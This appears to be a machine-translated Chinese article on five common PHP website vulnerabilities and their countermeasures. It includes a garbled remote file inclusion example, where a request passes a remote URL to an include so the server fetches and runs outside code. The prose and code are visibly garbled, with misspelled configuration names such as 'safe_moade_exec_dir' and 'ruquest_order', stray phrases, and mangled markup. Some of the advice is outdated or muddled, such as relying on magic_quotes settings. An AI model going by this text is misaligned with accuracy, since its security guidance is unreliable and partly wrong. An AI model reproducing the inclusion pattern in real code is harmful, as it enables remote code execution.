常见PHP网站安全漏洞。

一、常见的PHP网站安全漏洞

PHP目前常见的漏洞有五个。它们是会话文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里简单介绍一下这些漏洞。

1.会话文件漏洞

会话攻击是黑客最常用的攻击之一。用户访问网站时，为了防止客户每次进入页面都要输入自己的账号和密码，PHP设置了Session和Cookie，方便用户使用和访问。

2.SQL注入脆弱性

在开发网站时，程序员对用户输入数据缺乏综合判断或过滤不严，导致服务器执行一些恶意信息，如用户信息查询等。黑客可以根据恶意程序返回的结果获取相应的信息。这就是月星微的SQL注入弱点。

3.脚本执行漏洞

脚本执行漏洞的常见原因是程序员在开发网站时对用户提交的URL参数过滤较少，用户提交的URL可能包含恶意代码，导致跨站脚本攻击。以前的PHP网站经常存在脚本执行漏洞，但是随着PHP版本的升级，这些问题已经减少或者不复存在。

4.全局变量脆弱性

PHP中的变量不需要像其他开发语言那样，在使用时提前声明。PHP中的变量可以直接使用，无需声明。使用时系统自动创建，不需要解释变量类型。系统会根据上下文自动确定变量类型。这种方法可以大大降低程序员编程出错的概率，使用起来非常方便。

5.文件漏洞

文件漏洞通常是由于网站开发者在设计网站时对外部数据提供的过滤不够，导致黑客利用漏洞在web进程上执行相应的命令。假设您在LSM . PHP:include($ b . & quot；/AAA . PHP & quot；。)，对于黑客来说，可以利用变量$b实现远程攻击，也可以利用黑客自己的代码攻击网站。可以向服务器提交a.php include = http://LZ 7 . 0 . 0 . 1/b . PHP，然后执行b.php的指令。

二、PHP中常见漏洞的防范措施

1.防止会话漏洞

从前面的分析可以知道，最常见的会话攻击是会话劫持，即黑客通过各种攻击获取用户的会话ID，然后使用被攻击用户的身份登录相应的网站。所以可以通过以下方法来防止:一是可以定期更改会话ID，可以通过PHP自身的函数来实现；第二是更改会话名称。通常，会话的默认名称是PHPSESSID。这个变量通常保存在cookie中。如果你改变它的名字，你可以阻止黑客的一些攻击。第三是关闭透明会话ID。所谓透明，就是当http请求不使用cookies制作会话id时，通过一个链接传递会话ID。关闭透明sessionid可以通过操作PHP.ini文件来实现；第四，隐藏参数通过URL传递，可以保证黑客即使获取了会话数据，也很难获得会话ID变量的值，因为相关参数是隐藏的。

2.预防SQL注入脆弱性

黑客注入SQL的方式有很多种，灵活多变，但SQL注入器的共同点是利用输入过滤漏洞。因此，要想从根本上防范SQL注入，根本的解决办法是加强对请求命令，尤其是查询请求命令的过滤。具体包括以下几点:第一，过滤语句参数化，即通过参数化语句输入用户信息，而不是直接将用户输入嵌入到语句中。第二，在网站开发过程中尽量少使用解释性程序，黑客经常用这种方法执行非法命令；第三，在开发网站时，尽量避免网站出现bug，否则黑客可能会利用这些信息攻击网站；仅仅预防SQL注入是不够的，此外，我们应该经常使用专业的漏洞扫描工具来扫描网站的漏洞。

3.防止脚本执行漏洞。

黑客攻击脚本执行漏洞的方式多种多样，非常灵活。因此，必须采取各种防范方法的综合手段，有效防范黑客攻击脚本执行漏洞。这里常用的方法有四种。一种是预设可执行文件的路径。可以通过safe_moade_exec_dir实现；二是处理命令参数，一般用escapeshellarg函数实现；三是使用系统自带的函数库，而不是外部命令；第四，可以减少操作时外部命令的使用。

4.预防全局变量漏洞。

关于PHP全局变量的漏洞，以前的PHP版本有这样的问题，但是PHP版本升级到5.5以后，通过设置php.ini，设置ruquest_order为GPC就可以实现。另外，在php.ini配置文件中，通过设置magic_quotes_runtime的布尔值，可以设置是否在外部吸引人的数据中反斜杠溢出字符。为了保证网站程序可以在服务器的任何设置状态下运行。可以使用get_magic_quotes_runtime检测整个程序开始时的设置状态来决定是否手动处理，或者使用set_magic_quotes_runtime(0)在开始时(或者不需要自动转义时)关闭。

5.防止文件漏洞

PHP文件的泄漏可以通过设置和配置服务器来防止。这里具体操作如下:首先关闭PHP代码中的错误提示，可以防止黑客通过错误提示获取数据库信息和web文件的物理路径；第二，谨慎设置open_basedir，即禁止目录外的文件操作；这可以保护本地文件或远程文件，防止它们受到攻击。这里还要注意防范会话文件和上传文件的攻击。第三是将safe-made设置为打开状态，以便标准化要执行的命令。通过禁止文件上传，可以有效提高PHP网站的安全系数。